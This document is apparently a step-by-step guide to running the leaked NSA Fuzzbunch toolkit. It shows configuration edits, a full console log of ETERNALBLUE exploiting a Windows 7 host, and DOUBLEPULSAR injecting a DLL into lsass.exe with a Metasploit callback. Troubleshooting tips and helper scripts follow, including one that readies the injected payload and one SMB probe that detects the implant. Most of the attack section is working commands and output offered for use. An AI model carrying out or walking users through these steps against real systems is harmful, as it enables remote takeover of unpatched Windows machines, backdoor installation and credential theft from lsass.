0x01 Download the NSA toolkit

NSA toolkit download

The attack scripts need a 32-bit Python 2.6 environment, so the attacking machine also needs these two installers:

python-2.6.6.msi, pywin32-221.win32-py2.6.exe

0x02 Edit the NSA tool configuration files

  • Edit C:\Users\Administrator\Desktop\shadowbroker-master\windows\fb.py

Comment out line 72, addplugins(fb, "ListeningPost", LP_DIR, EDFPlugin), so that load_plugins reads as below. The leaked archive does not ship the ListeningPost plugins, so leaving that line in makes fb.py fail while loading plugins.

def load_plugins(fb):
    fb.io.pre_input(None)
    fb.io.print_msg("Loading Plugins")
    fb.io.post_input()
    addplugins(fb, "Exploit",       EXPLOIT_DIR, EDFPlugin)
    addplugins(fb, "Payload",       PAYLOAD_DIR, EDFPlugin)
    addplugins(fb, "Touch",         TOUCH_DIR,   EDFPlugin)
    addplugins(fb, "ImplantConfig", IMPLANT_DIR, EDFPlugin)
    #addplugins(fb, "ListeningPost", LP_DIR,      EDFPlugin)
    addplugins(fb, "Special",       SPECIAL_DIR, DAVEPlugin, DeployableManager)

  • Edit C:\Users\Administrator\Desktop\shadowbroker-master\windows\Fuzzbunch.xml

Change the Resources path on line 19 and the logs path on line 24 to the directory the toolkit is actually stored in:

<t:parameter name="ResourcesDir" description="Absolute path of the Resources Directory" type="String" default="C:\Users\Administrator\Desktop\shadowbroker-master\windows\Resources"/>
<t:parameter name="LogDir" description="Absolute path of an Initial Log Directory" type="String" default="C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs"/>
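
The two edits above can be applied and checked from a script. The following is an added example and is not part of the original post or of the Fuzzbunch code. It is Python 3 (the framework itself needs 32-bit Python 2.6, but this helper only rewrites text files and imports nothing from it). The parameter names ResourcesDir and LogDir and the addplugins(...) call come from the files shown above; the regex-based edit is an assumption, because the full Fuzzbunch.xml schema is not shown on this page.

```python
# Added example, not from the original post or the Fuzzbunch code: apply the
# two configuration edits from a script and verify the result.  Python 3.
# The regex-based edit is an assumption; the real file's schema is not shown.
import os
import re
import sys

# Matches: name="ResourcesDir" ... default="<old value>"  (attributes may be
# separated by whitespace, or by nothing at all in a copy-pasted file).
PARAM_RE = r'(name="{name}"[^>]*?default=")([^"]*)(")'


def retarget_xml(xml_text, install_dir):
    """Point the ResourcesDir and LogDir defaults under install_dir.

    Raises ValueError unless each parameter occurs exactly once, so an
    unchanged config cannot pass unnoticed."""
    targets = {
        "ResourcesDir": os.path.join(install_dir, "Resources"),
        "LogDir": os.path.join(install_dir, "logs"),
    }
    for name, path in targets.items():
        pattern = re.compile(PARAM_RE.format(name=name), re.DOTALL)
        # A callable replacement keeps backslashes in Windows paths literal.
        xml_text, count = pattern.subn(
            lambda m, p=path: m.group(1) + p + m.group(3), xml_text)
        if count != 1:
            raise ValueError("expected one %s parameter, found %d" % (name, count))
    return xml_text


def configured_paths(xml_text):
    """Return {parameter name: default path} for the two directory parameters."""
    found = {}
    for name in ("ResourcesDir", "LogDir"):
        m = re.search(PARAM_RE.format(name=name), xml_text, re.DOTALL)
        if m:
            found[name] = m.group(2)
    return found


def disable_listening_post(fb_py_text):
    """Comment out the addplugins(fb, "ListeningPost", ...) call in fb.py.

    Idempotent: a line that is already commented out is left as it is."""
    out, found = [], False
    for line in fb_py_text.splitlines(keepends=True):
        stripped = line.lstrip()
        if 'addplugins(fb, "ListeningPost"' in stripped:
            found = True
            if not stripped.startswith("#"):
                line = line[:len(line) - len(stripped)] + "#" + stripped
        out.append(line)
    if not found:
        raise ValueError("ListeningPost addplugins call not found in fb.py")
    return "".join(out)


def main(install_dir):
    xml_path = os.path.join(install_dir, "Fuzzbunch.xml")
    fb_path = os.path.join(install_dir, "fb.py")
    with open(xml_path, "r", newline="") as f:
        xml_text = retarget_xml(f.read(), install_dir)
    with open(xml_path, "w", newline="") as f:
        f.write(xml_text)
    with open(fb_path, "r", newline="") as f:
        fb_text = disable_listening_post(f.read())
    with open(fb_path, "w", newline="") as f:
        f.write(fb_text)
    # fb.py looks in LogDir for projects at startup, so both directories
    # should exist before the tool is run.
    for name, path in configured_paths(xml_text).items():
        state = "ok" if os.path.isdir(path) else "MISSING"
        print("%-12s %s  [%s]" % (name, path, state))


if __name__ == "__main__":
    main(os.path.abspath(sys.argv[1] if len(sys.argv) > 1 else "."))
```

Run it from the windows\ directory of the toolkit (or pass that directory as the first argument); it refuses to proceed if a parameter is missing or duplicated rather than writing a half-edited file.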

0x03 Run the fb.py script to carry out the ETERNALBLUE attack

  • Environment:
    Target    Windows 7/2008    10.130.3.246
    Attacker  Windows 10        10.130.3.243 (runs Fuzzbunch)
    Attacker  Kali              10.130.3.242 (used as the callback IP)
  • Run fb.py to carry out the Eternalblue attack

Run C:\Users\Administrator\Desktop\shadowbroker-master\windows\fb.py with the 32-bit Python 2.6 installed in 0x01:

Microsoft Windows [Version 10.0.18363.1316]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Desktop\shadowbroker-master\windows>python fb.py

--[ Version 3.5.1

[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => C:\Users\Administrator\Desktop\shadowbroker-master\windows\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs
[*] Autorun ON

ImplantConfig Autorun List
==========================

  0) prompt confirm
  1) execute

Exploit Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute

Special Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute

Payload Autorun List
====================

  0) apply
  1) prompt confirm
  2) execute

[+] Set FbStorage => C:\Users\Administrator\Desktop\shadowbroker-master\windows\storage
[*] Retargetting Session

[?] Default Target IP Address [] : 10.130.3.246
[?] Default Callback IP Address [] : 10.130.3.242
[?] Use Redirection [yes] : no
[?] Base Log directory [C:\Users\Administrator\Desktop\shadowbroker-master... (plus 13 characters)] :
[*] Checking C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs for projects

Index     Project
-----     -------
0         Create a New Project

[?] Project [0] :
[?] New Project Name :
[?] Set target log directory to 'C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs\z10.130.3.246'? [Yes] :
[*] Initializing Global State
[+] Set TargetIp => 10.130.3.246
[+] Set CallbackIp => 10.130.3.242
[!] Redirection OFF
[+] Set LogDir => C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs\z10.130.3.246

Module: Global Variables
========================

Name                    Value
----                    -----
ResourcesDir            C:\Users\Administrator\Desktop\shadowbroker-master\windows\Resources
Color                   True
ShowHiddenParameters    False
FbStorage               C:\Users\Administrator\Desktop\shadowbroker-master\windows\storage
LogDir                  C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs\z10.130.3.246
TargetIp                10.130.3.246
CallbackIp              10.130.3.242
TmpDir                  C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs\z10.130.3.246
NetworkTimeout          60

fb >
fb > use Eternalblue

[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.130.3.246
[*] Applying Session Parameters
[*] Running Exploit Touches
[!] Enter Prompt Mode :: Eternalblue

Module: Eternalblue
===================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              10.130.3.246
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
Target                WIN72K8R2

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address
[?] TargetIp [10.130.3.246] :

[*]  TargetPort :: Port used by the SMB service for exploit connection
[?] TargetPort [445] :

[*]  VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.
[?] VerifyTarget [True] :

[*]  VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.
[?] VerifyBackdoor [True] :

[*]  MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3.
[?] MaxExploitAttempts [3] :

[*]  GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.
[?] GroomAllocations [12] :

[*]  Target :: Operating System, Service Pack, and Architecture of target OS

    0) XP            Windows XP 32-Bit All Service Packs
   *1) WIN72K8R2     Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

[?] Target [1] :

[!] Preparing to Execute Eternalblue

[*]  Mode :: Delivery mechanism

   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1

[+] Run Mode: FB
[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] :
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.130.3.246] :
[?] Destination Port [445] :
[+] (TCP) Local 10.130.3.246:445
[+] Configure Plugin Remote Tunnels

Module: Eternalblue
===================

Name                  Value
----                  -----
DaveProxyPort         0
NetworkTimeout        60
TargetIp              10.130.3.246
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
ShellcodeBuffer
Target                WIN72K8R2

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (39 bytes):
0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
0x00000020  50 61 63 6b 20 31 00                             Pack 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending SMBv2 buffers
..........DONE.
DONE.
[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
[+] Backdoor NOT installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Trying again with 17 Groom Allocations
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (39 bytes):
0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
0x00000020  50 61 63 6b 20 31 00                             Pack 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending SMBv2 buffers
.....DONE.
[+] Sending final SMBv2 buffers
......DONE.
[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit)
[+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000  08 00                                            ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded

fb Payload (Doublepulsar) > use Doublepulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.130.3.246
[*] Applying Session Parameters
[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              10.130.3.246
TargetPort            445
DllPayload            C:\x86.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x64
Function              RunDLL

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds).  Use -1 for no timeout.
[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address
[?] TargetIp [10.130.3.246] :

[*]  TargetPort :: Port used by the Double Pulsar back door
[?] TargetPort [445] :

[*]  Protocol :: Protocol for the backdoor to speak

   *0) SMB     Ring 0 SMB (TCP 445) backdoor
    1) RDP     Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] :

[*]  Architecture :: Architecture of the target OS

    0) x86     x86 32-bits
   *1) x64     x64 64-bits

[?] Architecture [1] :

[*]  Function :: Operation for backdoor to perform

    0) OutputInstall     Only output the install shellcode to a binary file on disk.
    1) Ping              Test for presence of backdoor
   *2) RunDLL            Use an APC to inject a DLL into a user mode process.
    3) RunShellcode      Run raw shellcode
    4) Uninstall         Remove's backdoor from system

[?] Function [2] :

[*]  DllPayload :: DLL to inject into user mode
[?] DllPayload [C:\x86.dll] : C:\\x64.dll

[+] Set DllPayload => C:\\x64.dll

[*]  DllOrdinal :: The exported ordinal number of the DLL being injected to call
[?] DllOrdinal [1] :

[*]  ProcessName :: Name of process to inject into
[?] ProcessName [lsass.exe] :

[*]  ProcessCommandLine :: Command line of process to inject into
[?] ProcessCommandLine [] :

[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.130.3.246] :
[?] Destination Port [445] :
[+] (TCP) Local 10.130.3.246:445
[+] Configure Plugin Remote Tunnels

Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              10.130.3.246
TargetPort            445
DllPayload            C:\x64.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x64
Function              RunDLL

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0x33521E64
SMB Connection string is: Windows 7 Ultimate 7601 Service Pack 1
Target OS is: 7 x64
Target SP is: 1
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Command completed successfully
[+] Doublepulsar Succeeded
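
Both plugins above open with "Pinging backdoor..." and decide from the reply whether the DOUBLEPULSAR implant is already resident. The same check can be made from any host, which is how a defender finds implanted machines after an incident like this one. The script below is an added example and is not part of the original post or of Fuzzbunch; it is Python 3 with only the standard library. It implements the check the public detectors use (Countercept's detect_doublepulsar_smb.py and nmap's smb-double-pulsar-backdoor): an anonymous SMBv1 session, a tree connect to IPC$, then an SMB_COM_TRANSACTION2 request with subcommand SESSION_SETUP (0x000e) and Multiplex ID 0x41. A clean host echoes MID 0x41 in its error reply; an implanted host answers with MID 0x51. The packets are hand-built here, so the values not named in that description (buffer sizes, capabilities, native OS strings, the Trans2 Timeout value 0x00a4d9a6 the public "ping" carries) are this example's choices, not something the page states.

```python
# Added example, not from the original post or from Fuzzbunch/DOUBLEPULSAR:
# stand-alone SMBv1 probe for the ring-0 implant.  Sends Trans2 SESSION_SETUP
# with MID 0x41 after a null session + IPC$ tree connect; an implanted host
# replies with MID 0x51, a clean one echoes 0x41.  Python 3, stdlib only.
import socket
import struct
import sys

SMB_COM_TRANSACTION2, SMB_COM_NEGOTIATE = 0x32, 0x72
SMB_COM_SESSION_SETUP_ANDX, SMB_COM_TREE_CONNECT_ANDX = 0x73, 0x75
TRANS2_SESSION_SETUP = 0x000E        # the subcommand the implant hooks
PROBE_MID, IMPLANT_MID = 0x41, 0x51  # MID we send / MID DOUBLEPULSAR answers with
PING_TIMEOUT = 0x00A4D9A6            # Trans2 Timeout the public "ping" carries


def smb_header(command, tid=0, uid=0, mid=PROBE_MID):
    """32-byte SMBv1 header: flags 0x18, flags2 unicode+NT status, PID 0xfeff."""
    return (b"\xffSMB" + struct.pack("<BIBHH", command, 0, 0x18, 0xC007, 0)
            + b"\x00" * 8                                  # SecurityFeatures
            + struct.pack("<HHHHH", 0, tid, 0xFEFF, uid, mid))


def netbios(smb):
    """NetBIOS session-service framing: type byte 0x00 plus a 24-bit length."""
    return struct.pack(">I", len(smb)) + smb


def negotiate():
    dialects = b"\x02NT LM 0.12\x00"
    return smb_header(SMB_COM_NEGOTIATE) + b"\x00" + struct.pack("<H", len(dialects)) + dialects


def session_setup():
    """Null session: empty account and domain, one-byte OEM password (keeps the
    UTF-16 strings on an even offset)."""
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 4356, 10, 0, 0, 1, 0, 0, 0xD4)
    data = (b"\x00" + b"\x00\x00" + b"\x00\x00"
            + "Windows 2000 2195".encode("utf-16-le") + b"\x00\x00"
            + "Windows 2000 5.0".encode("utf-16-le") + b"\x00\x00")
    return smb_header(SMB_COM_SESSION_SETUP_ANDX) + b"\x0d" + words + struct.pack("<H", len(data)) + data


def tree_connect(host, uid):
    path = ("\\\\%s\\IPC$" % host).encode("utf-16-le") + b"\x00\x00"
    data = b"\x00" + path + b"?????\x00"        # 1-byte password, then path, service
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0x0008, 1)
    return smb_header(SMB_COM_TREE_CONNECT_ANDX, uid=uid) + b"\x04" + words + struct.pack("<H", len(data)) + data


def trans2_ping(tid, uid):
    """Trans2 SESSION_SETUP: 12 zero parameter bytes at offset 66, no data."""
    words = struct.pack("<HHHHBBHIHHHHHBBH", 12, 0, 1, 0, 0, 0, 0, PING_TIMEOUT,
                        0, 12, 66, 0, 78, 1, 0, TRANS2_SESSION_SETUP)
    data = b"\x00" + b"\x00" * 12               # pad byte + parameters
    return smb_header(SMB_COM_TRANSACTION2, tid=tid, uid=uid) + b"\x0f" + words + struct.pack("<H", len(data)) + data


def parse_header(pkt):
    """Header fields of a NetBIOS-framed SMBv1 packet (request or reply)."""
    if len(pkt) < 36 or pkt[4:8] != b"\xffSMB":
        raise ValueError("not an SMBv1 packet")
    command, status = struct.unpack_from("<BI", pkt, 8)
    tid, _pid, uid, mid = struct.unpack_from("<HHHH", pkt, 28)
    return {"command": command, "status": status, "tid": tid, "uid": uid, "mid": mid}


def classify_ping_reply(pkt):
    """'implanted', 'clean' or 'unknown', judged only by the reply's Multiplex ID."""
    hdr = parse_header(pkt)
    if hdr["command"] != SMB_COM_TRANSACTION2:
        return "unknown"
    return {IMPLANT_MID: "implanted", PROBE_MID: "clean"}.get(hdr["mid"], "unknown")


def recv_smb(sock):
    """Read one NetBIOS-framed packet; raise if the peer closes early."""
    head = sock.recv(4)
    if len(head) < 4:
        raise ConnectionError("connection closed")
    body, length = b"", struct.unpack(">I", head)[0] & 0x00FFFFFF
    while len(body) < length:
        chunk = sock.recv(length - len(body))
        if not chunk:
            raise ConnectionError("short SMB packet")
        body += chunk
    return head + body


def probe(host, port=445, timeout=5.0):
    """Four-packet exchange against host; returns the classification string."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(netbios(negotiate()))
        if parse_header(recv_smb(s))["status"] != 0:
            raise RuntimeError("SMBv1 negotiate refused (SMB1 disabled?)")
        s.sendall(netbios(session_setup()))
        setup = parse_header(recv_smb(s))
        if setup["status"] != 0:
            raise RuntimeError("null session refused, status 0x%08x" % setup["status"])
        s.sendall(netbios(tree_connect(host, setup["uid"])))
        tid = parse_header(recv_smb(s))["tid"]
        s.sendall(netbios(trans2_ping(tid, setup["uid"])))
        return classify_ping_reply(recv_smb(s))


if __name__ == "__main__":
    print(probe(sys.argv[1]))
```

The probe only talks SMB; it installs nothing and, unlike the exploit, cannot crash the target. Two caveats: a "clean" result only says the SMB variant of the implant is absent (the plugin also offers an RDP backdoor on 3389, which this does not check), and a host with SMB1 or null sessions disabled raises rather than reporting clean. The implant lives in kernel memory and is gone after a reboot; the plugin's Uninstall function removes it without one.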
  • Things to note

If the Eternalblue run fails, try it again. Fuzzbunch already retries on its own (MaxExploitAttempts is 3; in the transcript above the first attempt with 12 groom allocations failed and the retry with 17 succeeded), and if all attempts fail you can run the plugin once more. Each attempt corrupts non-paged pool on the target, so a failed attempt can bluescreen it.

Only move on to Doublepulsar after Eternalblue reports "Backdoor installed".

Execute the attack: Doublepulsar's RunDLL function injects the DLL given as DllPayload into ProcessName (lsass.exe above) via an APC and calls the export at DllOrdinal (1).

Don't forget to set the msf listener to x64, otherwise the session dies. The DLL you inject and the listener's payload must both match the architecture the backdoor ping reported; here that was x64, which is why the plugin's default DllPayload C:\x86.dll was replaced with C:\x64.dll and Architecture was left at x64.
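
The architecture mismatch above is easy to check before injecting: the DLL's PE file header states its machine type, and the ping already printed the target's. The script below is an added example, not part of the original post; it is Python 3 with only the standard library, and the function names are this example's own. It reads the IMAGE_FILE_HEADER (the Machine field and the IMAGE_FILE_DLL characteristic) and compares it against the "x86" or "x64" string from the ping, and it includes a constructed stub PE so it can be exercised without a real DLL.

```python
# Added example, not from the original post: confirm from the PE header that a
# file is a DLL and that its architecture matches what the backdoor ping reported
# ("x64 (64-bit)" above) before handing it to Doublepulsar's RunDLL.  Python 3.
import struct
import sys

IMAGE_FILE_MACHINE_I386 = 0x014C        # IMAGE_FILE_HEADER.Machine (winnt.h)
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_DLL = 0x2000                 # IMAGE_FILE_HEADER.Characteristics bit
MACHINE_NAMES = {IMAGE_FILE_MACHINE_I386: "x86", IMAGE_FILE_MACHINE_AMD64: "x64"}


def pe_info(data):
    """Return (arch, is_dll) for a PE image held in memory; ValueError if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature at e_lfanew")
    # IMAGE_FILE_HEADER (20 bytes) directly follows the 4-byte signature.
    machine, _nsect, _ts, _symtab, _nsyms, _optsize, characteristics = \
        struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    arch = MACHINE_NAMES.get(machine, "unknown(0x%04x)" % machine)
    return arch, bool(characteristics & IMAGE_FILE_DLL)


def check_payload(data, backdoor_arch):
    """backdoor_arch is the string the ping printed ('x86' or 'x64').
    Returns (ok, reason)."""
    arch, is_dll = pe_info(data)
    if not is_dll:
        return False, "image is not a DLL (IMAGE_FILE_DLL not set)"
    if arch != backdoor_arch:
        return False, ("DLL is %s but the backdoor reported %s: injection fails "
                       "and any listener session dies" % (arch, backdoor_arch))
    return True, "DLL is %s, matching the backdoor's %s" % (arch, backdoor_arch)


def make_stub_pe(machine, characteristics=IMAGE_FILE_DLL):
    """Constructed sample for testing: DOS stub + PE signature + file header,
    no sections and no code."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)      # e_lfanew: right after the stub
    header = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0, characteristics)
    return bytes(dos) + b"PE\x00\x00" + header


if __name__ == "__main__":
    # usage: check_dll.py C:\x64.dll x64
    with open(sys.argv[1], "rb") as f:
        ok, reason = check_payload(f.read(), sys.argv[2] if len(sys.argv) > 2 else "x64")
    print(("OK: " if ok else "MISMATCH: ") + reason)
    sys.exit(0 if ok else 1)
```

RunDLL calls the export at DllOrdinal, so the DLL also needs an exported function at that ordinal (1 by default); this script does not parse the export table, so confirm that separately, for example with dumpbin /exports on the attacking Windows machine.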
